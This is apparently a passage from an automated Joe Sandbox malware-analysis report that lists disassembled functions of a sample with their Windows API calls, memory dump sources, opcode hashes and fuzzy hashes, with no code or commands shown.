                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(00876DDF,00000000,00000400), ref: 00876C74
                                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00876C95
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                                                                                    • Opcode ID: fac0bf3a3a7e76f7e9a4211183fe5911a7ec1c7adb41646e4ecaafb505c45682
                                                                                                                                                                                                    • Instruction ID: fbe624652b43b57534a497805f023324f832d92b1c338ab9cdee57a7ba624472
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fac0bf3a3a7e76f7e9a4211183fe5911a7ec1c7adb41646e4ecaafb505c45682
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8D0C931344700BFFA120B618D06F2B7B99FF86B51F18C404B799E84E0DA78D424B629
                                                                                                                                                                                                    Function 008A19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008A19EF,?,?,00000008,?,?,008A168F,00000000), ref: 008A1C21
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                                                    • Opcode ID: ff54d963afc5f3b33cf5457db8bca31686f7840fa9826dd86a9cfee807c274d0
                                                                                                                                                                                                    • Instruction ID: db2d43cb4a15ee8d680d13afda6650bd7b43e43c5115c37241584009b38f11cf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff54d963afc5f3b33cf5457db8bca31686f7840fa9826dd86a9cfee807c274d0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2DB15035610608DFEB15CF28C48AB657BE0FF46364F258658E89ACF6A1C335ED92CB40
                                                                                                                                                                                                    Function 0088F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0088F66A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                                                    • Opcode ID: 7049d31512ac2240ace38fdd0edae8a265ef334c3999f1107bfe36b8339def01
                                                                                                                                                                                                    • Instruction ID: 39c5d42d09dfda52dbc4c68aefc26d052fd5f7a186c41d1dbf22ca0cb2e7aef0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7049d31512ac2240ace38fdd0edae8a265ef334c3999f1107bfe36b8339def01
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C5190B19016099FEB24DF98E8957AEBBF5FB48314F24893AD501EB252D374E940CF50
                                                                                                                                                                                                    Function 0087B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0087B16B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Version
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                                                                                    • Opcode ID: d66f255b9a8e8909a8ddcb728b18bb3515c399273894db355a7ae4a0797a41be
                                                                                                                                                                                                    • Instruction ID: c14cb4ce5045f75b6402d11efa0a0f9138e909615288f6fbf83eb56b42ed95fc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d66f255b9a8e8909a8ddcb728b18bb3515c399273894db355a7ae4a0797a41be
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9F03AB4E10A088FDB18DB18ECA66D973F2FB99315F604795D619D3390D7B0E9818E60
                                                                                                                                                                                                    Function 008740FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                                    • API String ID: 0-4203073231
                                                                                                                                                                                                    • Opcode ID: fffcb444d9eedc22a78a0af0c1f25a3d90260467368fa856ccf8c223f60819d4
                                                                                                                                                                                                    • Instruction ID: 2bb316701494a4c088548af4112817230e72389452fbe3c6149cb5e9715c38ab
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fffcb444d9eedc22a78a0af0c1f25a3d90260467368fa856ccf8c223f60819d4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45C147B2A083418FD354CF29D88065AFBE1BFC9208F19892DE998D7311D734E944DB96
                                                                                                                                                                                                    Function 0088F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0088F3A5), ref: 0088F9DA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                    • Opcode ID: 7b1a8f4fac84abe9bf48e37e1bc4b64172175050590d1a5b44b28c1a01af8e7f
                                                                                                                                                                                                    • Instruction ID: 281ab486d30aa8518bbb50b083cf2bd7c947db57b6e93318a0f8d58d01e36153
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b1a8f4fac84abe9bf48e37e1bc4b64172175050590d1a5b44b28c1a01af8e7f
                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                    Function 0089C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                                    • Opcode ID: 5aac3293f61b99b4809a0b1a068836080ad6d4abf333f95b239ed7aa3865c450
                                                                                                                                                                                                    • Instruction ID: 5c7848f27151bffe2353cfcdaea72e1e50ff1d18dc47bf789b9663286c100f2e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5aac3293f61b99b4809a0b1a068836080ad6d4abf333f95b239ed7aa3865c450
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAA001706026019BAB448F35AE496493BA9FA66691709816AB509C5560EA2485A0AB01
                                                                                                                                                                                                    Function 008862CA Relevance: .8, Instructions: 829COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                                                                                                                                                                    • Instruction ID: cee78443973bdc98138b0bf2df53db0c8925356691d653f7d2b9d0a59ebf0f5d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F62C1716047898FCB25DF28C8906A9BBE1FF95304F08896DD8AACB346E734E955CB11
                                                                                                                                                                                                    Function 008877EF Relevance: .8, Instructions: 817COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                                                                                                                                                                    • Instruction ID: cbfb027fc935f0d048b2ab37bb05d054f2e6c3c1b6fb52e491b9e2379aa52d0d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD62C5716083498FCB19DF28C8809A9BBF1FF95304F18896DE99ACB346D730E945CB15
                                                                                                                                                                                                    Function 0087F461 Relevance: .7, Instructions: 694COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                                                                                                                                                                    • Instruction ID: e43a11e1493dbf65976b5c4919c2abdda4861909cf1ed084fa3456d3bdefc35b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE524972A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                                                                                                                                    Function 00887153 Relevance: .5, Instructions: 536COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 26df1b3144b81dd329e072f6770dff52904025d434637cfca8b5ec040aa9bbac
                                                                                                                                                                                                    • Instruction ID: 9bb2a6bd25eac8e7798150ffeeed1c64d2ecb79442c43d08275208b8fbf81557
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26df1b3144b81dd329e072f6770dff52904025d434637cfca8b5ec040aa9bbac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F212A0B16187068BC718DF28C490A79B7F1FB94308F24892EE996C7781E334E995DB46
                                                                                                                                                                                                    Function 0087C426 Relevance: .5, Instructions: 454COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: bb6d348274cae80767715de87a3561005160d7a5c7dc3984c006eb2140bdc5e9
                                                                                                                                                                                                    • Instruction ID: 8171f44745b7f9a67d9ac447bf98aecc662fd3f46fbc747dc028931e212e4cda
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb6d348274cae80767715de87a3561005160d7a5c7dc3984c006eb2140bdc5e9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7F1AB716083059FC758CF28C48462ABBE1FFDA358F288A2EF5C9D7259D630E945CB42
                                                                                                                                                                                                    Function 0087E9B7 Relevance: .3, Instructions: 320COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 2627ef6b6b9cddc1b22454d1692af19c1948e158f5b9bd57e7ad379ab52eadfe
                                                                                                                                                                                                    • Instruction ID: 053a6f45a8aa1455ec823399ac4af17c32375b161c3b6b71f6df2a4fca7b4a4c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2627ef6b6b9cddc1b22454d1692af19c1948e158f5b9bd57e7ad379ab52eadfe
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8E149755083949FC344CF29D89086ABFF0BF9A300F49495EF9C497352D235EA29DB92
                                                                                                                                                                                                    Function 00884088 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                                                                                                                                                                    • Instruction ID: c57b2d6fe1b1a5f49dedde4813f547c8c575d74f9aa142378808ca07cb4cd974
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B89146B220434A8BDB28FA68D895BBE77D5FBA0304F10092DE99AC7282DB74D545C753
                                                                                                                                                                                                    Function 008843BF Relevance: .2, Instructions: 243COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
